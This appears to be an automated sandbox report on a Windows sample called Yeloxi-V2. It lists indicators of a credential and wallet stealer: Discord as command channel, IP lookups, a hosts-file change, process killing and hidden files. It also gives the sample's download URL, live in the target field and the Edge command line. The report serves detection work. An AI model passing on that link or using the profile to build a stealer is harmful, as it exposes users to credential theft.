hxxps://fastupload[.]io/en/qrTsYtdAHwxx9JI/file

Analysis

max time kernel
123s
max time network
127s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
28-04-2024 14:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://fastupload.io/en/qrTsYtdAHwxx9JI/file

Score

8^/10

spyware upx

Malware Config

Signatures

Drops file in Drivers directory 3 IoCs

Processes:

attrib.exeYeloxi-V2.exeattrib.exe

description	ioc	process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Yeloxi-V2.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Executes dropped EXE 1 IoCs

Processes:

rar.exe

pid process

232 rar.exe

pid	process
232	rar.exe

Loads dropped DLL 17 IoCs

Processes:

Yeloxi-V2.exe

pid	process
608	Yeloxi-V2.exe
608	Yeloxi-V2.exe
608	Yeloxi-V2.exe
608	Yeloxi-V2.exe
608	Yeloxi-V2.exe
608	Yeloxi-V2.exe
608	Yeloxi-V2.exe
608	Yeloxi-V2.exe
608	Yeloxi-V2.exe
608	Yeloxi-V2.exe
608	Yeloxi-V2.exe
608	Yeloxi-V2.exe
608	Yeloxi-V2.exe
608	Yeloxi-V2.exe
608	Yeloxi-V2.exe
608	Yeloxi-V2.exe
608	Yeloxi-V2.exe

UPX packed file 55 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/608-627-0x00007FFCE5030000-0x00007FFCE5619000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI40642\python311.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI40642\_ctypes.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI40642\libffi-8.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI40642\_ssl.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI40642\_sqlite3.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI40642\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI40642\_queue.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI40642\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI40642\_hashlib.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI40642\_decimal.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI40642\_bz2.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI40642\unicodedata.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI40642\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI40642\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI40642\libssl-3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI40642\libcrypto-3.dll	upx
behavioral1/memory/608-650-0x00007FFCFD5C0000-0x00007FFCFD5CF000-memory.dmp	upx
behavioral1/memory/608-649-0x00007FFCFA350000-0x00007FFCFA373000-memory.dmp	upx
behavioral1/memory/608-662-0x00007FFCF96E0000-0x00007FFCF970D000-memory.dmp	upx
behavioral1/memory/608-666-0x00007FFCE5000000-0x00007FFCE5023000-memory.dmp	upx
behavioral1/memory/608-665-0x00007FFCF95E0000-0x00007FFCF95F9000-memory.dmp	upx
behavioral1/memory/608-668-0x00007FFCE4E80000-0x00007FFCE4FF7000-memory.dmp	upx
behavioral1/memory/608-674-0x00007FFCE4E40000-0x00007FFCE4E73000-memory.dmp	upx
behavioral1/memory/608-677-0x00007FFCE4D70000-0x00007FFCE4E3D000-memory.dmp	upx
behavioral1/memory/608-673-0x00007FFCFD300000-0x00007FFCFD30D000-memory.dmp	upx
behavioral1/memory/608-678-0x00007FFCE4840000-0x00007FFCE4D62000-memory.dmp	upx
behavioral1/memory/608-672-0x00007FFCF8F50000-0x00007FFCF8F69000-memory.dmp	upx
behavioral1/memory/608-682-0x00007FFCE4720000-0x00007FFCE483C000-memory.dmp	upx
behavioral1/memory/608-681-0x00007FFCF83B0000-0x00007FFCF83C4000-memory.dmp	upx
behavioral1/memory/608-680-0x00007FFCFD1E0000-0x00007FFCFD1ED000-memory.dmp	upx
behavioral1/memory/608-882-0x00007FFCE5030000-0x00007FFCE5619000-memory.dmp	upx
behavioral1/memory/608-894-0x00007FFCFA350000-0x00007FFCFA373000-memory.dmp	upx
behavioral1/memory/608-913-0x00007FFCE5030000-0x00007FFCE5619000-memory.dmp	upx
behavioral1/memory/608-918-0x00007FFCE5000000-0x00007FFCE5023000-memory.dmp	upx
behavioral1/memory/608-924-0x00007FFCE4840000-0x00007FFCE4D62000-memory.dmp	upx
behavioral1/memory/608-923-0x00007FFCE4D70000-0x00007FFCE4E3D000-memory.dmp	upx
behavioral1/memory/608-922-0x00007FFCE4E40000-0x00007FFCE4E73000-memory.dmp	upx
behavioral1/memory/608-920-0x00007FFCF8F50000-0x00007FFCF8F69000-memory.dmp	upx
behavioral1/memory/608-919-0x00007FFCE4E80000-0x00007FFCE4FF7000-memory.dmp	upx
behavioral1/memory/608-929-0x00007FFCE5030000-0x00007FFCE5619000-memory.dmp	upx
behavioral1/memory/608-943-0x00007FFCE4720000-0x00007FFCE483C000-memory.dmp	upx
behavioral1/memory/608-953-0x00007FFCE4D70000-0x00007FFCE4E3D000-memory.dmp	upx
behavioral1/memory/608-952-0x00007FFCE4E40000-0x00007FFCE4E73000-memory.dmp	upx
behavioral1/memory/608-951-0x00007FFCFD300000-0x00007FFCFD30D000-memory.dmp	upx
behavioral1/memory/608-950-0x00007FFCF8F50000-0x00007FFCF8F69000-memory.dmp	upx
behavioral1/memory/608-949-0x00007FFCE4E80000-0x00007FFCE4FF7000-memory.dmp	upx
behavioral1/memory/608-948-0x00007FFCE5000000-0x00007FFCE5023000-memory.dmp	upx
behavioral1/memory/608-947-0x00007FFCF95E0000-0x00007FFCF95F9000-memory.dmp	upx
behavioral1/memory/608-946-0x00007FFCF96E0000-0x00007FFCF970D000-memory.dmp	upx
behavioral1/memory/608-945-0x00007FFCFD5C0000-0x00007FFCFD5CF000-memory.dmp	upx
behavioral1/memory/608-944-0x00007FFCFA350000-0x00007FFCFA373000-memory.dmp	upx
behavioral1/memory/608-940-0x00007FFCE4840000-0x00007FFCE4D62000-memory.dmp	upx
behavioral1/memory/608-942-0x00007FFCFD1E0000-0x00007FFCFD1ED000-memory.dmp	upx
behavioral1/memory/608-941-0x00007FFCF83B0000-0x00007FFCF83C4000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

163 discord.com
286 discord.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

205 ip-api.com
230 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exeWMIC.exeWMIC.exe

pid process

5320 WMIC.exe
5516 WMIC.exe
2132 WMIC.exe
Enumerates processes with tasklist 1 TTPs 5 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

5296 tasklist.exe
5968 tasklist.exe
5032 tasklist.exe
5488 tasklist.exe
5552 tasklist.exe

flow	ioc
163	discord.com
286	discord.com

flow	ioc
205	ip-api.com
230	ip-api.com

pid	process
5320	WMIC.exe
5516	WMIC.exe
2132	WMIC.exe

pid	process
5296	tasklist.exe
5968	tasklist.exe
5032	tasklist.exe
5488	tasklist.exe
5552	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

6088 systeminfo.exe

pid	process
6088	systeminfo.exe

Kills process with taskkill 38 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
5032	taskkill.exe
700	taskkill.exe
5848	taskkill.exe
6084	taskkill.exe
2248	taskkill.exe
2132	taskkill.exe
1492	taskkill.exe
4768	taskkill.exe
3644	taskkill.exe
5708	taskkill.exe
4968	taskkill.exe
2972	taskkill.exe
5504	taskkill.exe
676	taskkill.exe
572	taskkill.exe
4124	taskkill.exe
5028	taskkill.exe
3392	taskkill.exe
4264	taskkill.exe
676	taskkill.exe
5704	taskkill.exe
1492	taskkill.exe
5504	taskkill.exe
5948	taskkill.exe
2388	taskkill.exe
2200	taskkill.exe
928	taskkill.exe
3464	taskkill.exe
5692	taskkill.exe
1992	taskkill.exe
4688	taskkill.exe
4908	taskkill.exe
6052	taskkill.exe
3904	taskkill.exe
4912	taskkill.exe
2916	taskkill.exe
276	taskkill.exe
1520	taskkill.exe

Modifies registry class 1 IoCs

Processes:

msedge.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings msedge.exe
NTFS ADS 1 IoCs

Processes:

msedge.exe

description ioc process

File opened for modification C:\Users\Admin\Downloads\Yeloxi-V2.zip:Zone.Identifier msedge.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4816 PING.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings	msedge.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Yeloxi-V2.zip:Zone.Identifier	msedge.exe

pid	process
4816	PING.EXE

Suspicious behavior: EnumeratesProcesses 33 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1636	msedge.exe
1636	msedge.exe
3860	msedge.exe
3860	msedge.exe
1312	identity_helper.exe
1312	identity_helper.exe
5532	msedge.exe
5532	msedge.exe
5424	msedge.exe
5424	msedge.exe
3644	powershell.exe
3644	powershell.exe
5344	powershell.exe
5344	powershell.exe
5344	powershell.exe
3644	powershell.exe
3156	powershell.exe
3156	powershell.exe
3156	powershell.exe
700	powershell.exe
700	powershell.exe
700	powershell.exe
5412	powershell.exe
5412	powershell.exe
5412	powershell.exe
3604	powershell.exe
3604	powershell.exe
2264	powershell.exe
2264	powershell.exe
772	powershell.exe
772	powershell.exe
5772	powershell.exe
5772	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 23 IoCs

Processes:

msedge.exe

pid	process
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

AUDIODG.EXEWMIC.exetasklist.exepowershell.exepowershell.exeWMIC.exe

description	pid	process
Token: 33	4748	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4748	AUDIODG.EXE
Token: SeIncreaseQuotaPrivilege	6096	WMIC.exe
Token: SeSecurityPrivilege	6096	WMIC.exe
Token: SeTakeOwnershipPrivilege	6096	WMIC.exe
Token: SeLoadDriverPrivilege	6096	WMIC.exe
Token: SeSystemProfilePrivilege	6096	WMIC.exe
Token: SeSystemtimePrivilege	6096	WMIC.exe
Token: SeProfSingleProcessPrivilege	6096	WMIC.exe
Token: SeIncBasePriorityPrivilege	6096	WMIC.exe
Token: SeCreatePagefilePrivilege	6096	WMIC.exe
Token: SeBackupPrivilege	6096	WMIC.exe
Token: SeRestorePrivilege	6096	WMIC.exe
Token: SeShutdownPrivilege	6096	WMIC.exe
Token: SeDebugPrivilege	6096	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6096	WMIC.exe
Token: SeRemoteShutdownPrivilege	6096	WMIC.exe
Token: SeUndockPrivilege	6096	WMIC.exe
Token: SeManageVolumePrivilege	6096	WMIC.exe
Token: 33	6096	WMIC.exe
Token: 34	6096	WMIC.exe
Token: 35	6096	WMIC.exe
Token: 36	6096	WMIC.exe
Token: SeDebugPrivilege	5296	tasklist.exe
Token: SeDebugPrivilege	3644	powershell.exe
Token: SeIncreaseQuotaPrivilege	6096	WMIC.exe
Token: SeSecurityPrivilege	6096	WMIC.exe
Token: SeTakeOwnershipPrivilege	6096	WMIC.exe
Token: SeLoadDriverPrivilege	6096	WMIC.exe
Token: SeSystemProfilePrivilege	6096	WMIC.exe
Token: SeSystemtimePrivilege	6096	WMIC.exe
Token: SeProfSingleProcessPrivilege	6096	WMIC.exe
Token: SeIncBasePriorityPrivilege	6096	WMIC.exe
Token: SeCreatePagefilePrivilege	6096	WMIC.exe
Token: SeBackupPrivilege	6096	WMIC.exe
Token: SeRestorePrivilege	6096	WMIC.exe
Token: SeShutdownPrivilege	6096	WMIC.exe
Token: SeDebugPrivilege	6096	WMIC.exe
Token: SeSystemEnvironmentPrivilege	6096	WMIC.exe
Token: SeRemoteShutdownPrivilege	6096	WMIC.exe
Token: SeUndockPrivilege	6096	WMIC.exe
Token: SeManageVolumePrivilege	6096	WMIC.exe
Token: 33	6096	WMIC.exe
Token: 34	6096	WMIC.exe
Token: 35	6096	WMIC.exe
Token: 36	6096	WMIC.exe
Token: SeDebugPrivilege	5344	powershell.exe
Token: SeIncreaseQuotaPrivilege	5320	WMIC.exe
Token: SeSecurityPrivilege	5320	WMIC.exe
Token: SeTakeOwnershipPrivilege	5320	WMIC.exe
Token: SeLoadDriverPrivilege	5320	WMIC.exe
Token: SeSystemProfilePrivilege	5320	WMIC.exe
Token: SeSystemtimePrivilege	5320	WMIC.exe
Token: SeProfSingleProcessPrivilege	5320	WMIC.exe
Token: SeIncBasePriorityPrivilege	5320	WMIC.exe
Token: SeCreatePagefilePrivilege	5320	WMIC.exe
Token: SeBackupPrivilege	5320	WMIC.exe
Token: SeRestorePrivilege	5320	WMIC.exe
Token: SeShutdownPrivilege	5320	WMIC.exe
Token: SeDebugPrivilege	5320	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5320	WMIC.exe
Token: SeRemoteShutdownPrivilege	5320	WMIC.exe
Token: SeUndockPrivilege	5320	WMIC.exe
Token: SeManageVolumePrivilege	5320	WMIC.exe

Suspicious use of FindShellTrayWindow 62 IoCs

Processes:

msedge.exe

pid	process
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

Processes:

msedge.exe

pid	process
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe
3860	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

msedge.exe

description	pid	process	target process
PID 3860 wrote to memory of 232	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 232	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1800	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1636	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 1636	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 784	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 784	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 784	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 784	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 784	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 784	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 784	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 784	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 784	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 784	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 784	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 784	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 784	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 784	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 784	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 784	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 784	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 784	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 784	3860	msedge.exe	msedge.exe
PID 3860 wrote to memory of 784	3860	msedge.exe	msedge.exe

Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exe

pid process

5544 attrib.exe
2964 attrib.exe
2584 attrib.exe

pid	process
5544	attrib.exe
2964	attrib.exe
2584	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://fastupload.io/en/qrTsYtdAHwxx9JI/file
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3860

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcfa333cb8,0x7ffcfa333cc8,0x7ffcfa333cd8
2⤵
PID:232

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1960 /prefetch:2
2⤵
PID:1800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1636

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
2⤵
PID:784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
2⤵
PID:4868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
2⤵
PID:1452

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
2⤵
PID:3332

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:1
2⤵
PID:5008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4708 /prefetch:1
2⤵
PID:1924

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3376 /prefetch:8
2⤵
PID:2348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
2⤵
PID:4744

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
2⤵
PID:2328

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5760 /prefetch:1
2⤵
PID:5088

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6484 /prefetch:1
2⤵
PID:4912

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6850740891086685608,479117044083629726,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6728 /prefetch:1
2⤵
PID:4624

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
